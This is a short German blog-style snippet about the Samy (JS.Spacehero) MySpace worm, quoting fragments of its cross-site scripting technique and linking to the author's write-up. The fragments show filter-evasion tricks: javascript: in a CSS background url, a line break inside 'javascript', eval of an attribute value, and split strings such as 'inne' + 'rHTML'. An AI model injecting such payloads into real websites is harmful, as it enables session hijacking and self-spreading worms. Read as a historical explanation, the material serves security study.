"Samy worm" or "JS.Spacehero worm"

Buy one XSS, get a CSRF for free von blog.thinkphp.de
X
 
<div style="background:url('javascript:alert(1)')">

<div id="mycode" expr="alert('hah!')" style="background:url('java
script:eval(document.all.mycode.expr)')">

expr="alert('double quote: ' + String.fromCharCode(34))

alert(eval('document.body.inne' + 'rHTML'));

eval('xmlhttp.onread' + 'ystatechange = callback');

usw. Details auf <a href="http://namb.la/popular/tech.html">namb.la/popular/tech.html</a>